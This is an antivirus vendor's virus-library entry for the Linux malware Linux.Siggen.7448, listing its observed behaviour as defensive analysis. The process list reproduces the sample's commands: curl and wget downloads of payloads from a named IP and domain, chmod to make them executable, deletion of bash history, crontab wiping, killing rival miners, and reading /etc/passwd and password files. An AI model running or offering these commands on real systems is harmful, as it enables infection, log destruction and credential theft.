FOR CUSTOMERS

My library

+ Add to library

Search

24/7 Tech support | Rules regarding submitting

Send a message

Call us

+7 (495) 789-45-86

Forum

Your tickets

Total: -
Active: -
Latest: -

Call us

+7 (495) 789-45-86

EN

RU CN DE EN ES FR IT JP KZ UZ PL BY

Support services

Dr.Web vxCube

Sign in to Dr.Web vxCube

VCI investigations

Virus library

Knowledge base

Technologies

Terminology

Training and education

Myths

Myths about anti-viruses

Linux.Siggen.7448

Added to the Dr.Web virus database: 2024-05-13

Virus description added: 2024-05-13

Technical Information

Malicious functions:

Removes itself

Launches processes:

curl -s -L -O 45.88.67.94/network
<SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
rm -rf /root/.bash_history
chmod +x iplist ips iptemp retea
grep -v false
cat .usrs
/usr/bin/pgrep pkill haiduc
mkdir /dev/shm/.x
chmod +x network
sed 1d iptemp
grep -v nologin
cat ips
rm -rf xmrig .diicot .black Opera
curl -O -s -L arhivehaceru.com/payload
rm -rf /dev/shm/retea /dev/shm/.magic
wget -q 45.88.67.94/network
uniq
chmod +x .teaca
/usr/bin/pgrep pkill Opera
crontab -r
/usr/bin/pgrep pkill xMEu
grep -v sync
sleep 3
rm -rf .black xmrig.1
grep 192.168
rm -rf retea ips iptemp ips iplist
/usr/bin/pgrep pkill java
rm -rf .retea
rm -rf pass
cut -d: -f1
/usr/bin/pgrep pkill xrx
/usr/bin/mawk awk -F. {print $1\x22.\x22$2}
wget -q arhivehaceru.com/payload
/usr/bin/pgrep pkill blacku
/usr/bin/pgrep pkill xmrig
/usr/bin/mawk awk {print $1}
cat retea
mkdir /tmp/.tmp
wget -q 45.88.67.94/ps
<0x2f>
rm -rf /dev/shm/.x /var/tmp/.update-logs /var/tmp/Documents /tmp/.tmp
curl -s -L -O 45.88.67.94/ps
grep 10.
rm -rf /dev/shm/.x /root/retea iplist ips iptemp pass retea <SAMPLE_FULL_PATH> /root/run.sh /root/stdout.log /root/stub.sh
grep -v halt
cat /etc/passwd
ip r
grep -v shutdown
rm -rf .bash_history /root/.bash_history
/usr/bin/pgrep pkill cnrig
chmod +x payload systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
grep -c . .usrs
grep 172.
sleep 1
chmod +x ps

Performs operations with the file system:

Modifies file access rights:

/var/tmp/payload
/var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-logind.service-4ZZQFi
/var/tmp/systemd-private-f0fd406c1a484a80879a20681d9207ef-systemd-timesyncd.service-rlMSmi
/dev/shm/.x/iplist
/dev/shm/.x/ips
/dev/shm/.x/iptemp
/dev/shm/.x/retea

Creates folders:

/tmp/.tmp
/.x

Deletes folders:

/.x

Creates or modifies files:

/var/tmp/payload
/dev/shm/.x/retea
/dev/shm/.x/ips
/dev/shm/.x/iptemp
/dev/shm/.x/iplist
/dev/shm/.x/.usrs
/dev/shm/.x/pass

Deletes files:

/root/.bash_history
/.x/pass
/.x/.usrs
/.x/iplist
/.x/iptemp
/.x/ips
/.x/retea
/root/run.sh
/root/stub.sh

Network activity:

Establishes connection:

8.#.8.8:53
12#.##.94.177:80
45.##.67.94:80

DNS ASK:

ar####haceru.com

Sends data to the following servers:

12#.##.94.177:80

Receives data from the following servers:

12#.##.94.177:80

Other:

Collects OS information

Collects CPU information

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number